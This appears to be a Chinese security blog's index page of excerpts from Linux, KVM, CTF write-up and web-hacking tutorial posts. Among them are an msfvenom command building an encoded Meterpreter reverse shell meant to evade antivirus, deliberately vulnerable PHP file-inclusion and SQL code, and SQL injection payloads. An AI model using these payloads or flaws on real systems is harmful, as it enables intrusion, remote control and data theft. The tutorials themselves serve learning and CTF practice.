- 博客(18)
- 收藏
- 关注
原创 Linux目录及文件总结
1.文件类型d 文件夹- 普通文件l 链接b 块设备文件p 管道文件c 字符设备文件s 套接口文件2.权限1.权限分配r 4 可读权限w 2 可写权限x 1 可执行权限2.文件权限解释drwxr-xr-x 10 root root 4906 jan 14 00:57 usr/文件类型 d所属
2018-02-07 18:19:52
316
原创 ubuntu-desktop-14.04.5(32.bit)搭建KVM
KVM(Kernel-based Virtual Machine)支持虚拟机嵌套,基于硬件的虚拟化环境情况物理机安装vmware 在vmware中安装ubuntu-desktop-14.04.5(32.bit)用以搭建KVMubuntu-desktop-14.04.5(32.bit)搭建KVM步骤1.在vmware中的cpu高级选项中勾选提供intel VT-x/EPT支持,勾选
2018-02-07 01:10:52
355
原创 php文件包含漏洞
1.文件包含的原理1.1为什么要使用文件包含将一些自定义函数或功能写在一个a文件内,当b文件中要使用到a文件内的一些函数或功能时,b文件只需要包含a文件,这样b文件就可以直接调用a文件内定义好的函数或一些功能,这样方便省事。1.2相关测试代码php文件包含代码 if ($_GET['file']) { include $_GET['file'];}els
2018-02-07 00:55:03
1146
原创 MSF生成meterpreter及静态免杀
1.静态免杀1.1编译c文件,静态免杀1.1.1 生成shellcode在kali命令行输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '/x00' lhost=192.168.1.160 lport=7777 -f c -o /home/shell/test01.c-
2018-01-26 17:23:27
5602
1
原创 CTF-06
题目说明:VLD1.打开链接,页面如图所示,问我懂不懂VLD 2.查看页面源码,提示index.php.txt文件 3.访问index.php.txt文件,返回的是index.php的操作码 Finding entry pointsBranch analysis from position: 0Jump found. Position 1 = 23, Position
2018-01-24 19:41:43
531
原创 CTF-08
题目说明:pyscript1.打开链接后,界面如图所示,提示要输入密码并提交 2.重新访问首页,并对其抓包–>send to repeater–>go 在响应头中得到Ciphertext 在响应内容中得到一些题目提示 3.根据题目说明,这道题就是写python脚本import hashlibimport requestsimport redef sha1(d
2018-01-19 22:50:04
462
原创 CTF-07
题目说明:天下武功,唯快不破1.打开链接后,页面如图所示 2.这应该是网站根目录下的index.php的源码,分析源码得知: 当访问index.php文件时,会将flag.php的内容写到一个txt文件里, 这个txt文件名为1到1000的一个随机数的md5加密结果, 其路径为根目录下的u目录下 3.编写python脚本爆破文件名,访问这个txt文件,不断刷新主页,增加成功概
2018-01-19 17:41:56
473
原创 CTF-06
题目说明:get flag1.打开链接,页面如下 2.点击Login,页面如下,是个登陆页面,有一个加密的验证码,验证码为对其进行md5加密后取前六位等于页面给定的这个字符串 3.编写python脚本,跑验证码import hashlibdef md5(str): m = hashlib.md5() m.update(str) q = m.hexdigest()
2018-01-19 15:44:45
674
原创 CTF-04
题目说明:phpinfo1.打开链接后,页面为一个phpinfo的页面,查看URL栏发现这是一个文件包含 2.查看了下phpinfo的信息,没有什么可用的信息,页面源码,响应头都没有可用信息,对网站进行扫描,发现了flag.php文件,包含之 3.直接本地包含,发现页面空空如也,说明内容被解析了 4.用php伪协议对其包含php://filter/read=convert
2018-01-19 11:33:41
383
原创 CTF-03
题目说明:ipspoofing1.打开链接后,来到一个页面,浏览一番,在页脚发现一个后台入口administrator,点击进去 2.在后台页面随意输入账号密码点击提交,登陆失败,提示我的ip不在许可范围内 3.查看页面源码,在源码中发现后台默认登陆的账号和密码administrator,administrator 4.再次提交,用burp抓包–>send to repeater–
2018-01-19 10:48:03
511
原创 CTF-02
题目说明:seelog1.打开链接后,就几个黑字:本站是内部网站,非请勿入 2.纯静态页面,源码也无注释提示,对其进行目录扫描,发现存在一个log目录,访问之 3.访问后发现该目录下有两个日志文件,根据题目说明,开始审查日志文件 4.错误日志文件没有有用信息,在访问日志中寻找线索 访问日志中有请求链接,服务器返回状态等有用信息,通过搜索200状态码来查看哪些链接访问成功
2018-01-18 20:23:56
572
原创 CTF-01
题目说明:robot1.打开链接后,界面就一个机器人图片,其他啥也没有 2.根据题目说明,联想到访问robots.txt文件 发现在admin目录下有一个3he11.php文件(此处有一处小坑,文件名中的1很像字母l) 3.访问3he11.php文件,页面返回一片空白,查看页面源码 get flage!
2018-01-17 20:03:08
773
原创 SQL注入-宽字节注入
1. GBK编码gbk为中文编码,是一种双字节编码,将两个字节编译为一个汉字,其中第一个字节称为高位字节,第二个字节称为低位字节。编码范围 高位81-FE 低位40-FE2.宽字节注入原理2.1php测试代码 error_reporting(0);$id = $_GET['id'];$id = addslashes($id);
2018-01-13 13:14:06
760
原创 SQL注入-文件操作
1.通过load_file()函数将文件内容爆出来前提条件 1. 当前权限对该文件可读 2. 文件在该服务器上 3. 路径完整 4. 文件大小小于max_allowed_packet 5. 当前数据库用户有FILE权限 6. secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作 SELEC
2018-01-13 11:59:18
5068
原创 SQL注入-盲注
执行SQL查询,其内容不能直接返回到页面,那么可以尝试盲注查询语句$id=$_GET['id'];SELECT * FROM test WHERE id='$id' LIMIT 0,1;1. 基于布尔的盲注通过页面是否异常来判断1.1 ascii()注入爆MySQL版本 ?id=1' AND left(version(),1)=5--+ //判
2018-01-12 00:42:54
1047
原创 SQL注入-有回显的注入
1.MySQL相关在MySQL 5+版本后,加入了information_schema这个库,该库存放了所有数据库的信息information_schema.columns包含所有表的字段 字段 table_schema 数据库名 table_name 表名 column_name
2018-01-12 00:13:09
6561
原创 SQL注入-注入点判断
1.注入点判断传入SQL语句可控参数分为两类 1. 数字类型,参数不用被引号括起来,如?id=1 2. 其他类型,参数要被引号扩起来,如?name="phone"判断某个链接是否存在SQL注入,可以通过对其传入的可控参数进行简单的构造,通过服务端返回的内容来判断有无注入其他类型构造测试 预期结果
2018-01-11 23:17:17
28445
原创 SQL注入-原理
1.原理由于过滤不严格,传入SQL语句中的可控参数经过构造,修改了SQL语句本身的结构,最后该语句被解析执行,造成信息泄露,被修改,被删除等后果,更甚造成服务器被掌控。php测试代码 error_reporting(0);$id = $_GET['id'];$con = mysql_connect('localhost','root','root');if(!$con){
2018-01-11 22:33:46
258
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人